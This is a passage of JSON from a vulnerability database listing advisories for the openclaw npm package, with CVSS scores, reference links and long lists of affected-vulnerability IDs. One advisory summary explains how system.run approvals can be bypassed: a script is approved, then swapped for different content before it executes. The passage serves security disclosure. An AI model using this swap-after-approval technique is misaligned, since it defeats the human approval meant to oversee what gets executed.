routes.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/88aee9161e0e6d32e810a25711e32a808a1777b2","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/88aee9161e0e6d32e810a25711e32a808a1777b2"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-sender-allowlist-bypass-in-microsoft-teams-plugin-via-route-allowlist-configuration","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-sender-allowlist-bypass-in-microsoft-teams-plugin-via-route-allowlist-configuration"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34506","reference_id":"CVE-2026-34506","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34506"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-g7cr-9h7q-4qxq","reference_id":"GHSA-g7cr-9h7q-4qxq","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-g7cr-9h7q-4qxq"},{"reference_url":"https://github.com/advisories/GHSA-xg59-f45v-9r9j","reference_id":"GHSA-xg59-f45v-9r9j","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xg59-f45v-9r9j"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74859?format=json","purl":"pkg:npm/openclaw@2026.3.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-54mc-t5s7-wyes"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkjm-wcmt-43br"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.8"}],"aliases":["GHSA-xg59-f45v-9r9j"],"risk_score":3.4,"exploitability":"0.5","weighted_severity":"6.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-g9jn-c2rf-byem"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91170?format=json","vulnerability_id":"VCID-gj27-bfws-uyfp","summary":"Duplicate Advisory: OpenClaw's system.run approvals did not bind mutable script operands across approval and execution\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-8g75-q649-6pv6. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.8 contains an approval bypass vulnerability in system.run where mutable script operands are not bound across approval and execution phases. Attackers can obtain approval for script execution, modify the approved script file before execution, and execute different content while maintaining the same approved command shape.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/c76d29208bf6a7f058d2cf582519d28069e42240","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/c76d29208bf6a7f058d2cf582519d28069e42240"},{"reference_url":"https://github.com/openclaw/openclaw/commit/cf3a479bd1204f62eef7dd82b4aa328749ae6c91","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/cf3a479bd1204f62eef7dd82b4aa328749ae6c91"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32921","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32921"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-script-content-modification-via-mutable-operand-binding-in-system-run","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-script-content-modification-via-mutable-operand-binding-in-system-run"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-8g75-q649-6pv6","reference_id":"GHSA-8g75-q649-6pv6","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-8g75-q649-6pv6"},{"reference_url":"https://github.com/advisories/GHSA-wwrj-437c-ppq4","reference_id":"GHSA-wwrj-437c-ppq4","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-wwrj-437c-ppq4"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74859?format=json","purl":"pkg:npm/openclaw@2026.3.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-54mc-t5s7-wyes"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"